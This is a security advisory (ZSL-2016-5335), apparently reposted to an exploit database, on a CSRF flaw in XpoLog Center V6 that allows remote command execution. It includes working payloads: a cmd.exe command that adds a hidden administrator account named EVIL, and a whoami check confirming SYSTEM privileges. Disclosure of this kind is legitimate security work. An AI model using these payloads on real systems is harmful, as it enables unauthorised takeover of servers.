XpoLog Center V6 CSRF Remote Command Execution Vendor: XpoLog LTD Product web page: http://www.xpolog.com Affected version: 6.4469 6.4254 6.4252 6.4250 6.4237 6.4235 5.4018 Summary: Applications Log Analysis and Management Platform. Desc: XpoLog suffers from arbitrary command execution. Attackers can exploit this issue using the task tool feature and adding a command with respected arguments to given binary for execution. In combination with the CSRF an attacker can execute system commands with SYSTEM privileges. Tested on: Apache-Coyote/1.1 Microsoft Windows Server 2012 Microsoft Windows 7 Professional SP1 EN 64bit Java/1.7.0_45 Java/1.8.0.91 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2016-5335 Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2016-5335.php 14.06.2016 -- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C net user EVIL pass123 /add & net localgroup Administrators EVIL /add"
-- exePath = "C:\windows\system32\cmd.exe" exeArgs = "/C whoami > c:\Progra~1\XpoLogCenter6\defaultroot\logeye\testingus.txt" GET http://10.0.0.17:30303/logeye/testingus.txt Response: nt authoritysystem # Iranian Exploit DataBase = http://IeDb.Ir [2016-07-23]